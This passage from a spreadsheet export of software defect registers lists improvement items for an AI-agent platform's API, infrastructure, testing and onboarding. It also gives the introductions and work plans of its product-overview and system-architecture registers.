    <t>### API-I2 — Surface failed router mounts
**Effect: medium, large at 3am.**
[API-09](#api-09--a-failed-import-silently-removes-a-whole-route-group). Collect the
`ImportError`s into a list and return it from `/health`. Diagnosing a missing feature area
becomes one curl instead of a log search.</t>
  </si>
  <si>
    <t>API-I3</t>
  </si>
  <si>
    <t>One pagination contract</t>
  </si>
  <si>
    <t>### API-I3 — One pagination contract
**Effect: medium.** [API-16](#api-16--there-is-no-universal-pagination). `limit`, `offset`
and a `total` in the envelope, on every list endpoint. Clients get one helper; the platform
gets endpoints that do not degrade with data volume.
Start with `GET /config/integrations`, which currently returns every company's rows to an
`app_admin` in one response.</t>
  </si>
  <si>
    <t>API-I4</t>
  </si>
  <si>
    <t>Generate the frontend service layer from OpenAPI</t>
  </si>
  <si>
    <t>### API-I4 — Generate the frontend service layer from OpenAPI
**Effect: large.** FastAPI publishes a schema. `frontend/src/types/index.ts` and the service
modules are hand-maintained against it.
Generating them makes [API-05](#api-05--the-frontend-calls-a-delete-route-that-does-not-exist)
and [API-06](#api-06--password-reset-two-documented-routes-neither-implemented) impossible
by construction — you cannot call a route that is not in the schema — and it fixes the
type-drift problem in
[FE-I7](16-FRONTEND-DEFECTS.md#fe-i7--generate-the-api-types-from-the-backend).</t>
  </si>
  <si>
    <t>API-I5</t>
  </si>
  <si>
    <t>One auth dependency, applied by default</t>
  </si>
  <si>
    <t>### API-I5 — One auth dependency, applied by default
**Effect: large for safety.** Today each route opts in to `get_current_user`, and
[API-01](#api-01--four-endpoints-are-open-or-wrongly-gated) is what happens when one
forgets.
Apply the dependency at the `include_router` level and make public routes opt **out**
explicitly. Then an unauthenticated endpoint is a deliberate, visible decision.</t>
  </si>
  <si>
    <t>API-I6</t>
  </si>
  <si>
    <t>Consistent error envelopes</t>
  </si>
  <si>
    <t>### API-I6 — Consistent error envelopes
**Effect: medium.** Some routes raise `HTTPException` with a string `detail`, some return
`{"error": ...}`, the gateway proxy returns its own `{"error": "Backend unavailable"}` on
503, and one Tata webhook returns `{"sucess": false}`.
A client cannot write one error handler. One envelope — `{"error": {"code", "message"}}` —
across the whole surface.</t>
  </si>
  <si>
    <t>API-I7</t>
  </si>
  <si>
    <t>Version the social-connections route</t>
  </si>
  <si>
    <t>### API-I7 — Version the social-connections route
**Effect: small, do it now.** [API-15](#api-15--apisocial-connections-breaks-the-versioning-convention).
There are no external consumers yet, so this is free today and a breaking change later.</t>
  </si>
  <si>
    <t>API-I8</t>
  </si>
  <si>
    <t>Make soft delete explicit in the API</t>
  </si>
  <si>
    <t>### API-I8 — Make soft delete explicit in the API
**Effect: small.** [API-18](#api-18--delete-apiv1aientitiesid-is-a-soft-delete). Return
`202 Accepted` with the new status, or add `?hard=true` for a real delete. Silently
returning `204` for an operation that does not delete is the shape that causes bug reports.</t>
  </si>
  <si>
    <t>API-I9</t>
  </si>
  <si>
    <t>Publish the OpenAPI schema as an artefact</t>
  </si>
  <si>
    <t>### API-I9 — Publish the OpenAPI schema as an artefact
**Effect: medium.** With the schema checked in and diffed on every change, an unintended
breaking change becomes a visible diff in review rather than a support ticket. It also
gives [API-I1](#api-i1--add-a-route-census-to-the-merge-gate) something concrete to compare
against.</t>
  </si>
  <si>
    <t>API-I10</t>
  </si>
  <si>
    <t>Rate-limit per route class, not globally</t>
  </si>
  <si>
    <t>### API-I10 — Rate-limit per route class, not globally
**Effect: medium.** Once
[GW-I1](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-i1--add-slowapimiddleware) and
[GW-I2](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-i2--set-remoteipheader-in-the-vhosts) land,
a single `200/minute` for every route is still wrong: `POST /auth/login` wants a tight
per-email limit, `POST /ai/execute` wants a per-company one, and a list endpoint wants
neither. Three limit classes cover the whole surface.
---</t>
  </si>
  <si>
    <t>IN-I1</t>
  </si>
  <si>
    <t>Fix CI first</t>
  </si>
  <si>
    <t>### IN-I1 — Fix CI first
**Effect: everything else depends on it.**
[IN-05](#in-05--the-repository-has-no-functioning-ci). Change the `paths` filter, add a
second workflow that runs `backend/tests/`, `lint_ai_layout.py`, ruff and the frontend
build.
Three registers in this set name a "census" guardrail — route, schema, registry, dependency
— and none of them can exist until there is somewhere to run them.</t>
  </si>
  <si>
    <t>IN-I2</t>
  </si>
  <si>
    <t>Daily off-host backups, and one restore test</t>
  </si>
  <si>
    <t>### IN-I2 — Daily off-host backups, and one restore test
**Effect: large.** [IN-01](#in-01--backups-are-monthly-and-on-the-same-disk-as-the-database),
[IN-02](#in-02--the-backup-script-writes-to-a-path-that-does-not-exist-here),
[IN-03](#in-03--there-is-no-restore-test).
In order: fix the paths, move the cron to daily, push the dump to object storage, then add
a monthly restore-and-verify job. The first two are minutes; the RPO goes from 31 days to
one.</t>
  </si>
  <si>
    <t>IN-I3</t>
  </si>
  <si>
    <t>Add log rotation</t>
  </si>
  <si>
    <t>### IN-I3 — Add log rotation
**Effect: medium, prevents an outage.**
[IN-09](#in-09--no-log-rotation). A `logrotate` config for `logs/*.log`. The most likely
cause of a full disk, and a full disk stops Postgres.</t>
  </si>
  <si>
    <t>IN-I4</t>
  </si>
  <si>
    <t>Harden the Dockerfile</t>
  </si>
  <si>
    <t>### IN-I4 — Harden the Dockerfile
**Effect: medium.** [IN-06](#in-06--the-dockerfile-runs-as-root-with---reload). Add a
non-root `USER`, drop `--reload`, and use a multi-stage build so the image does not carry
build tooling. Whoever containerises this next will otherwise inherit a root process
running LLM-authored code.</t>
  </si>
  <si>
    <t>IN-I5</t>
  </si>
  <si>
    <t>Commit a firewall configuration</t>
  </si>
  <si>
    <t>### IN-I5 — Commit a firewall configuration
**Effect: medium.** [IN-08](#in-08--no-firewall-configuration-exists-in-the-repository).
Even a `ufw` script in `deploy/` that allows 80/443 and denies the rest turns an assumption
into a checked-in artefact. Today nobody can tell from the repository whether the platform's
internal ports are exposed.</t>
  </si>
  <si>
    <t>IN-I6</t>
  </si>
  <si>
    <t>Instrument the worker and the gateway</t>
  </si>
  <si>
    <t>### IN-I6 — Instrument the worker and the gateway
**Effect: large for operability.** [IN-20](#in-20--the-gateway-and-the-worker-have-no-tracing).
`setup_telemetry` is 32 lines and already written. Calling it from the gateway, and wiring
`events.set_otel_exporter` in the worker, makes the two processes that do the real work
visible.
Pairs with [SA-I4](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-i4--give-the-worker-a-health-signal)
— a worker heartbeat, so a dead worker is an alarm rather than a pile of `PENDING` runs.</t>
  </si>
  <si>
    <t>IN-I7</t>
  </si>
  <si>
    <t>Build and version the frontend</t>
  </si>
  <si>
    <t>### IN-I7 — Build and version the frontend
**Effect: large.** Serving the SPA from `vite` in production means no minification, no
asset hashing, a larger attack surface, and no way to roll the frontend back independently
([IN-21](#in-21--there-is-no-rollback-procedure-beyond-git-checkout)).
`npm run build` plus an Apache `DocumentRoot` removes a whole process from the box. Same
item as [SA-I1](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-i1--serve-the-frontend-as-a-build-not-a-dev-server)
and [FE-I10](16-FRONTEND-DEFECTS.md#fe-i10--build-the-frontend-for-production).</t>
  </si>
  <si>
    <t>IN-I8</t>
  </si>
  <si>
    <t>Make stop_services.sh precise</t>
  </si>
  <si>
    <t>### IN-I8 — Make `stop_services.sh` precise
**Effect: small, prevents a bad day.**
[IN-11](#4-t2--traps-in-the-scripts-and-configs). The script already writes PID files and
already kills by port. The blanket `pkill -f "uvicorn"` at the end is a belt-and-braces step
that will one day kill someone else's application.</t>
  </si>
  <si>
    <t>IN-I9</t>
  </si>
  <si>
    <t>Pin one Python version</t>
  </si>
  <si>
    <t>### IN-I9 — Pin one Python version
**Effect: small.** [IN-10](#in-10--three-different-python-versions). Pick 3.12 (what the VM
installs), update `pyproject.toml` and the Dockerfile, and add it to the CI matrix once
[IN-I1](#in-i1--fix-ci-first) exists.</t>
  </si>
  <si>
    <t>IN-I10</t>
  </si>
  <si>
    <t>Write the four census checks</t>
  </si>
  <si>
    <t>### IN-I10 — Write the four census checks
**Effect: large, once CI exists.** The platform register names four mechanical checks, each
minutes to write and seconds to run:
| Check | Compares | Catches |
|---|---|---|
| Route census | router decorators vs [17](../17-api-reference.md) | dead routers, undocumented routes, mount-order mistakes |
| Schema census | `__tablename__` and columns vs [03](../03-data-model.md) | missing migrations ([DM-01](03-DATA-MODEL-DEFECTS.md#dm-01--subscription_tiers-has-no-migration), [DM-02](03-DATA-MODEL-DEFECTS.md#dm-02--phone_numbers-is-created-by-a-script-not-a-migration)) |
| Registry census | `ToolRegistry.register` calls vs [09](../09-tools.md) | unregistered and deprecated-but-exposed tools |
| Dependency census | adapter imports vs `pyproject.toml` and the venv | [LP-07](10-LLM-PROVIDERS-DEFECTS.md#lp-07--any-claude-integration-fails-on-its-first-call) (anthropic) and [GW-10](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-10--aiortc-is-not-installed-and-the-video-path-has-a-second-bug-behind-it) (aiortc) |
Between them they would have caught eight defects across this register set.
---</t>
  </si>
  <si>
    <t>TS-I1</t>
  </si>
  <si>
    <t>Turn on CI</t>
  </si>
  <si>
    <t>### TS-I1 — Turn on CI
**Effect: this is the whole file.** [TS-01](#ts-01--the-only-ci-workflow-has-never-fired),
[TS-02](#ts-02--1063-backend-tests-run-only-when-someone-remembers). Concretely:
1. Fix the `paths` filter on the existing workflow.
2. Add a second workflow that runs `scripts/run_ci_matrix.sh fast` on every pull request,
   with a Postgres service container.
3. Add `lint_ai_layout.py`, ruff and the frontend build to the same job.
There is nothing to write — the lanes, the tests and the gates all exist.</t>
  </si>
  <si>
    <t>TS-I2</t>
  </si>
  <si>
    <t>Make skips fail in CI</t>
  </si>
  <si>
    <t>### TS-I2 — Make skips fail in CI
**Effect: large.** [TS-05](#ts-05--three-test-tiers-skip-instead-of-failing). A green run
that skipped 229 infrastructure tests is worse than a red one, because it is believed.
An environment variable that converts the fixture skips into failures gives local
developers the convenience and CI the guarantee.</t>
  </si>
  <si>
    <t>TS-I3</t>
  </si>
  <si>
    <t>Make an unmocked LLM call fail loudly</t>
  </si>
  <si>
    <t>### TS-I3 — Make an unmocked LLM call fail loudly
**Effect: large.** [TS-06](#ts-06--an-unmocked-llm-call-returns-a-stub-string-not-an-error).
A `STUB:` string that flows through assertions is a test that passes without testing. Raise
by default; keep stub mode behind an explicit fixture.</t>
  </si>
  <si>
    <t>TS-I4</t>
  </si>
  <si>
    <t>Add teardown to e2e/ and parity/</t>
  </si>
  <si>
    <t>### TS-I4 — Add teardown to `e2e/` and `parity/`
**Effect: medium.** [TS-07](#ts-07--e2e-does-not-roll-back),
[TS-16](#ts-16--the-parity-suite-leaves-tenants-behind). Either a transactional wrapper like
`integration/` uses, or a fixture that deletes what the test created. Without it, the two
slowest tiers depend on database state nobody controls.</t>
  </si>
  <si>
    <t>TS-I5</t>
  </si>
  <si>
    <t>Enable --strict-markers</t>
  </si>
  <si>
    <t>### TS-I5 — Enable `--strict-markers`
**Effect: medium.** [TS-14](#ts-14--pytestmarkintegration-is-used-and-not-registered),
[TS-15](#ts-15--marker-usage-is-far-below-marker-registration). Register `integration`,
delete `kpi` and `needs_redis`, and turn on strict markers so a typo fails instead of
silently excluding a test from every lane.</t>
  </si>
  <si>
    <t>TS-I6</t>
  </si>
  <si>
    <t>Add the four census tests</t>
  </si>
  <si>
    <t>### TS-I6 — Add the four census tests
**Effect: large — they catch what unit tests structurally cannot.** The platform register
names four mechanical checks, and between them they would have caught eight defects across
this register set:
| Check | Would have caught |
|---|---|
| Route census | [API-05](17-API-REFERENCE-DEFECTS.md#api-05--the-frontend-calls-a-delete-route-that-does-not-exist), [API-08](17-API-REFERENCE-DEFECTS.md#api-08--apiv1phone-pool-does-not-exist-at-runtime) |
| Schema census | [DM-01](03-DATA-MODEL-DEFECTS.md#dm-01--subscription_tiers-has-no-migration), [DM-02](03-DATA-MODEL-DEFECTS.md#dm-02--phone_numbers-is-created-by-a-script-not-a-migration) |
| Registry census | [PO-17](01-PRODUCT-OVERVIEW-DEFECTS.md#4-t2--dead-code-and-dead-surfaces), [TX-04](09-TOOLS-DEFECTS.md#tx-04--meta_spec_critic-is-a-tool-that-is-not-in-the-registry) |
| Dependency census | [LP-07](10-LLM-PROVIDERS-DEFECTS.md#lp-07--any-claude-integration-fails-on-its-first-call), [GW-10](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-10--aiortc-is-not-installed-and-the-video-path-has-a-second-bug-behind-it) |</t>
  </si>
  <si>
    <t>TS-I7</t>
  </si>
  <si>
    <t>Add a "declared but never called" check</t>
  </si>
  <si>
    <t>### TS-I7 — Add a "declared but never called" check
**Effect: large for this codebase specifically.** The single most common defect shape across
all twenty registers is **a module that is complete, unit-tested, and has no production
call site**: `ToolCostResolver`, `RedisRateLimiter`, `TrustLearner`,
`FailurePatternService`, `check_credit_gate`, `assemble_memory`, `PlanGenerator.replan`,
`Budget.can_afford`, `get_reasoning`.
A test that asserts every public entry point in a declared "service" module is referenced
from `src/` outside its own tests would have caught all nine — and would have prevented
[BC-05](14-BILLING-AND-CREDITS-DEFECTS.md#bc-05--three-of-the-four-credit-gates-have-no-callers)
and [MC-01](08-MEMORY-AND-CORTEX-DEFECTS.md#mc-01--cortex-is-write-only-on-the-live-path),
the two most consequential findings in this set.
**Being unit-tested is not evidence that a module runs.** That is the lesson this codebase
teaches most clearly, and it is testable.</t>
  </si>
  <si>
    <t>TS-I8</t>
  </si>
  <si>
    <t>Add a feature-flag census</t>
  </si>
  <si>
    <t>### TS-I8 — Add a feature-flag census
**Effect: medium.** Assert every key in `DEFAULTS` and `NUMERIC_DEFAULTS` appears in a
`get_bool` or `get_float` call somewhere in `src/`. Eight flags currently fail that check
([GH-16](15-GOVERNANCE-AND-HITL-DEFECTS.md#4-t2--feature-flags-that-are-not-controls)),
including the one where the flag says "on" and the runtime says "off"
([TX-01](09-TOOLS-DEFECTS.md#tx-01--the-per-company-sandbox-flag-is-never-read)).</t>
  </si>
  <si>
    <t>TS-I9</t>
  </si>
  <si>
    <t>Set up the frontend suite</t>
  </si>
  <si>
    <t>### TS-I9 — Set up the frontend suite
**Effect: medium.** [TS-08](#ts-08--the-frontend-tests-cannot-run-at-all),
[TS-04](#ts-04--npm-run-lint-cannot-run-and-there-is-no-frontend-test-runner).
`npm i -D vitest jsdom`, add the `test` script, add `.eslintrc.cjs`, drop the `exclude` from
`tsconfig.json`. An afternoon, and it takes the frontend from zero checks to three.</t>
  </si>
  <si>
    <t>TS-I10</t>
  </si>
  <si>
    <t>Speed up the fast lane so people actually run it</t>
  </si>
  <si>
    <t>### TS-I10 — Speed up the fast lane so people actually run it
**Effect: medium.** Today the advice is "run `run_ci_matrix.sh fast` before pushing", which
depends on discipline. Two things make it stick: run it automatically
([TS-I1](#ts-i1--turn-on-ci)), and make the local run fast enough that nobody skips it —
`pytest-xdist` on the 745 unit tests plus directory-based selection would put the fast lane
in seconds.
---</t>
  </si>
  <si>
    <t>ON-I1</t>
  </si>
  <si>
    <t>Make setup one script</t>
  </si>
  <si>
    <t>### ON-I1 — Make setup one script
**Effect: large.** [ON-01](#on-01--the-setup-sequence-omits-two-required-steps),
[ON-02](#on-02--step-4-is-edit-a-file-to-fix-a-shipped-default),
[ON-03](#on-03--the-verification-step-passes-on-a-system-that-cannot-run-an-agent).
A `./bootstrap_dev.sh` that does everything — venv, `.env` with the **right** port, docker,
migrations, `merge_phone_tables`, `seed_admin_user`, `seed_sandbox_sku`, npm, and a seeded
`text_generation` default — replaces ten manual steps and three documented workarounds.
Time-to-first-run goes from "an afternoon and a colleague" to one command.</t>
  </si>
  <si>
    <t>ON-I2</t>
  </si>
  <si>
    <t>Add a doctor command</t>
  </si>
  <si>
    <t>### ON-I2 — Add a `doctor` command
**Effect: large.** [ON-03](#on-03--the-verification-step-passes-on-a-system-that-cannot-run-an-agent).
One script that checks: database reachable on the right port, migrations at head,
`phone_numbers` exists, admin user exists, `model_task_defaults` has a `text_generation`
row, Redis reachable, worker heartbeat present, and which routers failed to mount
([API-I2](17-API-REFERENCE-DEFECTS.md#api-i2--surface-failed-router-mounts)).
That covers the majority of "it's broken and I don't know why" for both new developers and
on-call.</t>
  </si>
  <si>
    <t>ON-I3</t>
  </si>
  <si>
    <t>Replace the first-change exercise</t>
  </si>
  <si>
    <t>### ON-I3 — Replace the first-change exercise
**Effect: medium, and it sets the tone.**
[ON-06](#on-06--the-first-change-exercise-targets-a-deprecated-tool-through-an-unwired-gate).
The current exercise teaches an unwired gate on a deprecated tool.
Better first tasks, each real and small: add the missing `DELETE /ai/documents/{id}`
([PO-01](01-PRODUCT-OVERVIEW-DEFECTS.md#po-01--deleting-a-knowledge-base-document-always-fails)),
register the two missing worker jobs
([MC-I3](08-MEMORY-AND-CORTEX-DEFECTS.md#mc-i3--register-the-two-missing-worker-jobs)), or
add the four missing indexes
([DM-I1](03-DATA-MODEL-DEFECTS.md#dm-i1--add-the-indexes-the-queries-already-assume)).
Each teaches a real part of the system and leaves the codebase better.</t>
  </si>
  <si>
    <t>ON-I4</t>
  </si>
  <si>
    <t>Mark the unwired parts of the mental model</t>
  </si>
  <si>
    <t>### ON-I4 — Mark the unwired parts of the mental model
**Effect: large for correctness of understanding.**
[ON-05](#on-05--section-33-describes-a-memory-block-that-is-never-injected),
[ON-17](#on-17--the-glossary-defines-terms-for-features-that-do-not-run).
The document is already unusually honest in §9 and §7.3. Extending that honesty into §3
— the mental model — is the highest-value edit in this file. A newcomer who knows memory is
write-only today will debug correctly; one who does not will lose a day.</t>
  </si>
  <si>
    <t>ON-I5</t>
  </si>
  <si>
    <t>Link every document to its register</t>
  </si>
  <si>
    <t>### ON-I5 — Link every document to its register
**Effect: medium.** [ON-18](#on-18--the-20-minute-tour-points-at-documents-whose-60-second-sections-describe-unwired-features).
One line at the end of each §1: *"Known defects and improvements:
[NN-...-DEFECTS.md](...)"*. The tour then produces an accurate picture instead of an
aspirational one.</t>
  </si>
  <si>
    <t>ON-I6</t>
  </si>
  <si>
    <t>Delete the three traps in §7.3</t>
  </si>
  <si>
    <t>### ON-I6 — Delete the three traps in §7.3
**Effect: medium.** [ON-10](#4-t2--stale-references), [ON-11](#4-t2--stale-references),
[ON-12](#4-t2--stale-references). §7.3 is titled "Where the code is *not*" and lists three
places a newcomer will look and not find things.
Two of the three can simply be deleted — the `models.py` shim and the root `tests/`
directory. That is better than documenting them.</t>
  </si>
  <si>
    <t>ON-I7</t>
  </si>
  <si>
    <t>Extract from agent_loop.py now</t>
  </si>
  <si>
    <t>### ON-I7 — Extract from `agent_loop.py` now
**Effect: medium.** [ON-09](#on-09--core-has-20-lines-of-headroom-and-the-doc-says-so-twice).
Twenty lines of headroom means the next contributor to the kernel is forced into a
refactor they did not plan. Doing the extraction deliberately, now, is cheaper than doing
it under a ticket.</t>
  </si>
  <si>
    <t>ON-I8</t>
  </si>
  <si>
    <t>Move the phase docs to docs/history/</t>
  </si>
  <si>
    <t>### ON-I8 — Move the phase docs to `docs/history/`
**Effect: small.** [ON-14](#4-t2--stale-references). Four directories of historical plans
sit beside current documentation. Relocating them makes "the code is truth" a directory
structure rather than a warning.</t>
  </si>
  <si>
    <t>ON-I9</t>
  </si>
  <si>
    <t>Add a "how to verify your change actually runs" section</t>
  </si>
  <si>
    <t>### ON-I9 — Add a "how to verify your change actually runs" section
**Effect: large for this codebase specifically.** The most common defect shape across all
twenty registers is a module that is complete, unit-tested, and **never called**. A new
developer can write a well-tested feature here and ship nothing.
One short section — grep for call sites outside tests, add a trace span, run it end to end
and see it in the trace viewer — would inoculate against the single most common failure in
this repository. Pairs with
[TS-I7](19-TESTING-DEFECTS.md#ts-i7--add-a-declared-but-never-called-check).</t>
  </si>
  <si>
    <t>ON-I10</t>
  </si>
  <si>
    <t>Keep one accurate process/port table</t>
  </si>
  <si>
    <t>### ON-I10 — Keep one accurate process/port table
**Effect: small.** [ON-04](#on-04--the-five-process-table-lists-a-process-nothing-starts).
The five-process table appears in documents 01, 02, 18 and 20, and they do not all agree
about port 8002. One table, referenced from the others.
---</t>
  </si>
  <si>
    <t>CTX-001</t>
  </si>
  <si>
    <t>01. Product &amp; Functional Overview — Defect Register</t>
  </si>
  <si>
    <t>Context</t>
  </si>
  <si>
    <t># 01. Product &amp; Functional Overview — Defect Register
&gt; **What this document is:** the defects and improvement ideas that sit at the
&gt; *product* level — features a user can see, click or be promised, that do not work
&gt; the way the product says they do.
&gt; **Source document:** [`01-product-overview.md`](../01-product-overview.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** there are **no paying tenants**. Nothing here is a live emergency.
&gt; Everything in T0 should be closed before the first paying customer.
---</t>
  </si>
  <si>
    <t>Document introduction</t>
  </si>
  <si>
    <t>CTX-002</t>
  </si>
  <si>
    <t>How to read this file</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — `01-product-overview.md` says it and it was not re-checked
  by hand. Treat it as a strong lead, but confirm before you change code.
- Line numbers move. Search for the quoted function or variable name, not the line.
- Defects come first, then improvements. The two lists are separate on purpose:
  a defect is something broken, an improvement is something that works but costs
  more than it should.
This register is about **whole-product behaviour**. When a defect is really about
one subsystem, the deep entry lives in that subsystem's register and is only
cross-referenced here.
---</t>
  </si>
  <si>
    <t>CTX-003</t>
  </si>
  <si>
    <t>Contents</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — User-visible things that do not work](#2-t0--user-visible-things-that-do-not-work)
3. [T1 — Promises the product does not keep](#3-t1--promises-the-product-does-not-keep)
4. [T2 — Dead code and dead surfaces](#4-t2--dead-code-and-dead-surfaces)
5. [T3 — Rough edges](#5-t3--rough-edges)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-004</t>
  </si>
  <si>
    <t>1. Summary</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--user-visible-things-that-do-not-work) | User-visible things that do not work | 5 | Before the first paying tenant |
| [T1](#3-t1--promises-the-product-does-not-keep) | Promises the product does not keep | 6 | Before selling the feature |
| [T2](#4-t2--dead-code-and-dead-surfaces) | Dead code and dead surfaces | 6 | **Now** — free, nothing changes |
| [T3](#5-t3--rough-edges) | Rough edges | 5 | When the area is next touched |
**Total: 22 defects, 12 improvements.**
The three worth reading first:
- **[PO-01](#po-01--deleting-a-knowledge-base-document-always-fails)** — a button in
  the UI calls an endpoint that does not exist.
- **[PO-04](#po-04--any-logged-in-user-can-read-the-internal-cost-report)** — the raw
  cost basis, from which your margin can be worked out, is readable by any signed-in
  user.
- **[PO-06](#po-06--64-of-the-98-tools-are-unfinished-integrations)** — two thirds of</t>
  </si>
  <si>
    <t>the advertised tool count are social integrations that no production entity uses.
---</t>
  </si>
  <si>
    <t>CTX-005</t>
  </si>
  <si>
    <t>## 2. T0 — User-visible things that do not work</t>
  </si>
  <si>
    <t>CTX-006</t>
  </si>
  <si>
    <t>## 3. T1 — Promises the product does not keep</t>
  </si>
  <si>
    <t>CTX-007</t>
  </si>
  <si>
    <t>## 4. T2 — Dead code and dead surfaces
Free to remove. Nothing here can break anything that is not already broken.
| ID | Delete | Why | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-008</t>
  </si>
  <si>
    <t>&gt; Before deleting, confirm nothing still imports it:
&gt; `grep -rn "&lt;module_name&gt;" backend/src frontend/src --include=*.py --include=*.ts --include=*.tsx`
---</t>
  </si>
  <si>
    <t>CTX-009</t>
  </si>
  <si>
    <t>## 5. T3 — Rough edges</t>
  </si>
  <si>
    <t>CTX-010</t>
  </si>
  <si>
    <t>## 6. Improvements
These are not broken. They are places where the product costs more — in money, in
latency, or in user confusion — than it needs to.</t>
  </si>
  <si>
    <t>CTX-011</t>
  </si>
  <si>
    <t>7. Suggested order of work</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | T2 deletions — PO-12 to PO-17 | Free. The phase11 shims are already past their own removal date |
| **2** | PO-04, PO-01, PO-05 | Each is a small, self-contained change with a directly visible effect |
| **3** | PO-02, PO-03, PO-08 | Align the UI's promises with the API's rules |
| **4** | PO-I1 (worker blocking) then PO-20 | The largest throughput win in the product |
| **5** | PO-06, PO-07 | Decide the real tool surface before anyone sells it |
| **6** | PO-I2, PO-I10 | Build-time cost visibility and step testing — the two things that make the builder usable at scale |
---</t>
  </si>
  <si>
    <t>CTX-012</t>
  </si>
  <si>
    <t>Where to go next</t>
  </si>
  <si>
    <t>## Where to go next
- [01 — Product &amp; functional overview](../01-product-overview.md) — the document these
  defects were found against.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — the platform-wide list. PO-12,
  PO-16 and PO-17 also appear there as D-22, D-24 and D-25.
- [04 — Auth, RBAC &amp; tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md) — for PO-04 and PO-11.
- [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — for PO-06 and PO-07 in depth.
- [15 — Governance &amp; HITL](15-GOVERNANCE-AND-HITL-DEFECTS.md) — for PO-05 and PO-20.</t>
  </si>
  <si>
    <t>CTX-013</t>
  </si>
  <si>
    <t>02. System Architecture &amp; Topology — Defect Register</t>
  </si>
  <si>
    <t># 02. System Architecture &amp; Topology — Defect Register
&gt; **What this document is:** defects in how the processes are wired — ports, config
&gt; defaults, queues, proxies and the boot scripts — plus the improvements that would
&gt; make the topology cheaper and easier to run.
&gt; **Source document:** [`02-system-architecture.md`](../02-system-architecture.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** everything runs on **one VM**. Most of what follows only bites when
&gt; that stops being true, or when something restarts at a bad moment.
---</t>
  </si>
  <si>
    <t>CTX-014</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code or config file was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — taken from `02-system-architecture.md` without a re-check.
- The defects are grouped by how bad the outcome is, not by which file they live in.
- Improvements are separate. They are not bugs; they are places where the current
  shape costs more than it needs to.
---</t>
  </si>
  <si>
    <t>CTX-015</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Wrong by default](#2-t0--wrong-by-default)
3. [T1 — Silently does nothing](#3-t1--silently-does-nothing)
4. [T2 — Delete](#4-t2--delete)
5. [T3 — Fragile](#5-t3--fragile)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-016</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--wrong-by-default) | Wrong by default | 5 | Before the next deployment |
| [T1](#3-t1--silently-does-nothing) | Silently does nothing | 5 | Before relying on the feature |
| [T2](#4-t2--delete) | Delete | 5 | **Now** — free |
| [T3](#5-t3--fragile) | Fragile | 6 | When the area is next touched |
**Total: 21 defects, 10 improvements.**
The three worth reading first:
- **[SA-01](#sa-01--streaming_host-defaults-to-a-service-that-does-not-run)** — the
  default streaming host points at a retired port. Telephony WebSockets fail.
- **[SA-04](#sa-04--five-enqueue-calls-ignore-redis_url-and-hardcode-localhost)** —
  five job enqueues use arq's defaults instead of the configured Redis.
- **[SA-06](#sa-06--the-6-hourly-dreaming-cron-enqueues-a-job-the-worker-cannot-run)** —
  a cron has been firing four times a day for months and every job it schedules is
  rejected.
---</t>
  </si>
  <si>
    <t>CTX-017</t>
  </si>
  <si>
    <t>## 2. T0 — Wrong by default
These are defaults that are wrong out of the box. Each one works today only because
someone remembered to override it.</t>
  </si>
  <si>
    <t>CTX-018</t>
  </si>
  <si>
    <t>## 3. T1 — Silently does nothing</t>
  </si>
  <si>
    <t>CTX-019</t>
  </si>
  <si>
    <t>## 4. T2 — Delete
| ID | Delete | Why | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-020</t>
  </si>
  <si>
    <t>CTX-021</t>
  </si>
  <si>
    <t>## 5. T3 — Fragile</t>
  </si>
  <si>
    <t>CTX-022</t>
  </si>
  <si>
    <t>## 6. Improvements</t>
  </si>
  <si>
    <t>CTX-023</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | SA-01, SA-03, SA-05, SA-04 | Four wrong defaults. Each is a few lines and each is a live trap |
| **2** | SA-20 | Refuse to boot on placeholder secrets. One check, closes a real hole |
| **3** | T2 deletions — SA-11 to SA-15 | Free. Do SA-12 and SA-13 together as **W-1** |
| **4** | SA-06, SA-08 | Two background jobs that have never run. Decide each: wire up or delete |
| **5** | SA-I4 (worker health) | The single most valuable operational change on this list |
| **6** | SA-I1 (build the frontend), SA-I6 (split the worker pool) | The two changes that matter when load grows |
---</t>
  </si>
  <si>
    <t>CTX-024</t>
  </si>
  <si>
    <t>## Where to go next
- [02 — System architecture](../02-system-architecture.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — SA-12 and SA-13 are the platform
  register's **W-1**; SA-08 is D-21/D-26.
- [13 — Gateway &amp; real-time](13-GATEWAY-AND-REALTIME-DEFECTS.md) — for SA-09, SA-16,
  SA-17.
- [18 — Infrastructure &amp; deployment](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md) —
  for SA-02, SA-14, SA-21 and SA-I1.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — for what SA-06 actually
  breaks.</t>
  </si>
  <si>
    <t>CTX-025</t>
  </si>
  <si>
